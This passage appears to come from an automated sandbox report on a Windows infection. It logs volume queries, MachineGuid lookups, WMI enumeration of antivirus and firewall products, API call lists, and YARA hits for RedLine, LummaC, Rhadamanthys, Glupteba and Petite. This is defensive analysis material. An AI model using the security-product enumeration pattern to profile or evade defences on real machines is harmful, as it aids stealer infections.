Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\C086.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\C086.exe VolumeInformation
Source: C:\Windows\System32\dialer.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\F38F.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\33A6.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp

Code function: 23_2_00457DD8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,

23_2_00457DD8

Source: C:\Users\user\AppData\Local\Temp\4854.exe

Code function: 4_2_6CE8A25A GetSystemTimeAsFileTime,__aulldiv,

4_2_6CE8A25A

Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp

Code function: 23_2_00454AB8 GetUserNameA,

23_2_00454AB8

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe

Code function: 14_2_0041C85E __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,

14_2_0041C85E

Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe

Code function: 10_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

10_2_00403532

Source: C:\Users\user\AppData\Local\Temp\4854.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected Glupteba

Source: Yara match	File source: 15.3.31839b57a4f11171d6abc8bbc4451ee4.exe.3780000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.31839b57a4f11171d6abc8bbc4451ee4.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.31839b57a4f11171d6abc8bbc4451ee4.exe.2e90e67.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000003.2066199382.0000000003BC2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2724435477.00000000032D3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2567693218.0000000000843000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 31839b57a4f11171d6abc8bbc4451ee4.exe PID: 7216, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: 00000020.00000002.2626410097.0000000000D43000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2992, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 9E77.exe PID: 4048, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 3260, type: MEMORYSTR
Source: Yara match	File source: 30.3.9E77.exe.25a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001E.00000003.2170961305.00000000025A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Petite Virus

Source: Yara match	File source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-PFHT1.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-S6TO1.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-N2733.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-458PU.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-L31R1.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-HBK1Q.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-FH8NJ.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-RFBIV.tmp, type: DROPPED

Yara detected RHADAMANTHYS Stealer

Source: Yara match	File source: 00000021.00000002.2254271275.000000001BB01000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2579639062.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2749142755.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2733384950.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2685718453.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2598657111.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2671933578.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2589623228.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2601421528.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2579353533.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2766322903.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2524246310.00000162B3841000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2735752153.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2599342972.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2754627663.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2674739926.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2711828784.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2675907860.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2578924547.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2637787202.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2575495914.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2705435281.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2573590064.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2604182414.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2703030103.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2675453290.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2600355817.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2675138321.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2564289331.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2642967465.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2734180264.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2689183677.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2686086613.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2633965317.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2669460233.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2564740508.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2738413729.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2593035447.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2672383899.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2578573733.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2606999840.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2635361488.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2605648094.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2739604145.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2637330287.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2739194931.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2685151300.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2638553734.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2602553062.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2644099258.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2627137075.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2605031090.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2577695503.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2673068563.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2594779782.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2731190444.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2722127729.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2644959111.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2608660423.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2726975550.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2206636387.00000162B0C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2562339585.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2598333639.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2607875870.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2632610681.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2700525376.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2730383751.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2563346057.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2576231333.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2712495323.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2712931577.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2736607710.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2643465060.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2744176853.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 4.2.4854.exe.4acd9b0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.4854.exe.43f07f0.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.4854.exe.4acd9b0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.0.33A6.exe.790000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.4854.exe.43f07f0.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.1911380987.0000000004ACA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.2368989273.0000000000792000.00000002.00000001.01000000.00000023.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3067317156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3090070335.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2865187814.0000000003443000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
